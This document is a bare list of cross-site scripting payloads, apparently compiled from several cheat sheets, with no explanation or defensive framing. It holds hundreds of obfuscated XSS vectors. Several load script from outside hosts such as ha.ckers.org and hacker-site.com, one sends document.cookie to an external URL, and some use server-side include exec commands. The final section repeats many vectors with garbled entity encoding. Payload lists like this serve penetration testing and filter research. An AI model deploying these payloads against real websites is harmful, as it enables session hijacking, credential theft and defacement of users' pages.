<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert(document&period;location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)>
<form><iframe 	
 src="javascript:alert(1)"
	;>
<a href="data:application/x-x509-user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[]" onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
</form><input type="date" onfocus="alert(1)">
<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&
Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xxònerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript&colon;\u0061l&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=</SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags"
onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\
u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\
u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\
u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\
u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\
u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\
u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\
u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\
u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\
u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\
u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\
u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\
u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\
u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\
u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\
u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\
u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\
u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\
u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\
u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\
u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\
u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\
u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\
u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\
u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\
u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\
u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\
u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\
u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\
u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\
u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\
u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\
u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\
u0066\u0072\u0061\u006d\u0065\u003e');"></img>
</body>
</html>
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT> alert(“XSS”); </SCRIPT>
<BODY ONLOAD=alert("XSS")>
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG SRC="javascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<TABLE BACKGROUND="javascript:alert('XSS')">
<TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
';alert(String.fromCharCode(88,83,83))//\
';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//\
";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image:
url(javascript:alert('XSS'))">
<DIV STYLE="background-image:
url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE"
SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE>li {list-style-image:
url("javascript:alert('XSS')");}</STYLE><UL><LI>X
SS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&qu
ot;>
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<OBJECT TYPE="text/x-scriptlet"
DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="http://ha.ckers.org/xss.swf"
AllowScriptAccess="always"></EMBED>
a="get";&#10;b="URL("";&#10;c="javascript:&quot
;;&#10;d="alert('XSS');")";
eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-
image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE
type="text/css">BODY{background:url("javascript:alert('XSS&apo
s;)")}</STYLE>
<LINK REL="stylesheet"
HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link"
Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/
xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD
BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><!
[CDATA[cript:alert('XSS');">]]>
<XML ID="xss"><I><B><IMG SRC="javas
<? echo('<SCR)';
<BR SIZE="&{alert('XSS')}">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&amp
;#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&a
mp;#39;&#88;&#83;&#83;&#39;&#41;>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&am
p;#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000
108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&amp
;#0000083&#0000083&#0000039&#0000041>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70
&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&amp
;#x58&#x53&#x53&#x27&#x29>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;
charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMGSRC="javascr&
#x0D;ipt:alert
('XSS')">
perl -e 'print "<IMG SRC=java\
0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\
0IPT>";' > out
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG
"""><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
<SCRIPT a=">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" ''
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</
A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/
'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<script>document.vulnerable=true;</script>
<img SRC="jav ascript:document.vulnerable=true;">
<img SRC="javascript:document.vulnerable=true;">
<img SRC="  javascript:document.vulnerable=true;">
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script <B>document.vulnerable=true;</script>
<img SRC="javascript:document.vulnerable=true;"
<iframe src="javascript:document.vulnerable=true; <
<script>a=/XSS/\ndocument.vulnerable=true;</script>
\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<body BACKGROUND="javascript:document.vulnerable=true;">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC="javascript:document.vulnerable=true;">
<img LOWSRC="javascript:document.vulnerable=true;">
<bgsound SRC="javascript:document.vulnerable=true;">
<br SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<style>li {list-style-image:
url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
<meta HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:document.vulnerable=true;">
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
<table BACKGROUND="javascript:document.vulnerable=true;">
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
<div STYLE="width: expression(document.vulnerable=true);">
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE="text/javascript">document.vulnerable=true;</style>
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A
CLASS=XSS></a>
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</
style>

<base HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG
SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I
DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></span>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
<iframe src="vbscript:document.vulnerable=true;">
<img src="mocha:document.vulnerable=true;">
<img src="livescript:document.vulnerable=true;">
<a href="about:<script>document.vulnerable=true;</script>">
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<body onload="document.vulnerable=true;">
<div style="background-image: url(javascript:document.vulnerable=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style></script>
<<script>document.vulnerable=true;</script>
<![</script>
<script>document.vulnerable=true;</script>
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>;
REL=stylesheet">
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</
style>
<OBJECT TYPE="text/x-scriptlet"
DATA="http://www.securitycompass.com/scriptlet.html"></object>
<HTML xmlns:xss><?import namespace="xss"
implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
<script SRC="http://www.securitycompass.com/xss.jpg"></script>

<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
<script>document.write("<SCRI");</SCRIPT>PT
SRC="http://www.securitycompass.com/xss.js"></script>
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
</script><script>alert(1)</script>
</br style=a:expression(alert())>
<scrscriptipt>alert(1)</scrscriptipt>
<br size=\"&{alert('XSS')}\">
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\
";' > out
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\
";' > out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?
sid="%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";
;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//--
>;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
';';;!--";<;XSS>;=&;{()}
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
<;BASE HREF=";javascript:alert(';XSS';);//";>;
<;BGSOUND SRC=";javascript:alert(';XSS';);";>;
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
<;BODY ONLOAD=alert(';XSS';)>;
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
<;DIV STYLE=";width: expression(alert(';XSS';));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=javascript:alert(';XSS';)>;
<;IMG DYNSRC=";javascript:alert(';XSS';);";>;
<;IMG LOWSRC=";javascript:alert(';XSS';);";>;
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode";>;
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
<;STYLE>;li {list-style-image:
url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS
<;IMG SRC=';vbscript:msgbox(";XSS";)';>;
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
<;IMG SRC=";livescript:[code]";>;
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
<;META HTTP-EQUIV=";refresh";
CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;
URL=http://;URL=javascript:alert(';XSS';);";>;
<;IMG SRC=";mocha:[code]";>;
<;OBJECT TYPE=";text/x-scriptlet";
DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url
value=javascript:alert(';XSS';)>;<;/OBJECT>;
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&
#10;eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
<;XSS STYLE=";xss:expression(alert(';XSS';))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A
CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/
STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;;
REL=stylesheet";>;
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
<;HTML xmlns:xss>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;!
[CDATA[cript:alert(';XSS';);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!--
-->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
<;HTML>;<;BODY>;
<;!--[if gte IE 4]>;
<;META HTTP-EQUIV=";Set-Cookie";
Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo
';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
<;? echo(';<;SCR)';;
<;BR SIZE=";&;{alert(';XSS';)}";>;
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
<;IMG
RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#
108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
<;IMG
RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;
#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000
040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
<;IMG
SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#
x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>;
<;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
\";;alert(';XSS';);//
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
<;IMG SRC=";jav	ascript:alert(';XSS';);";>;
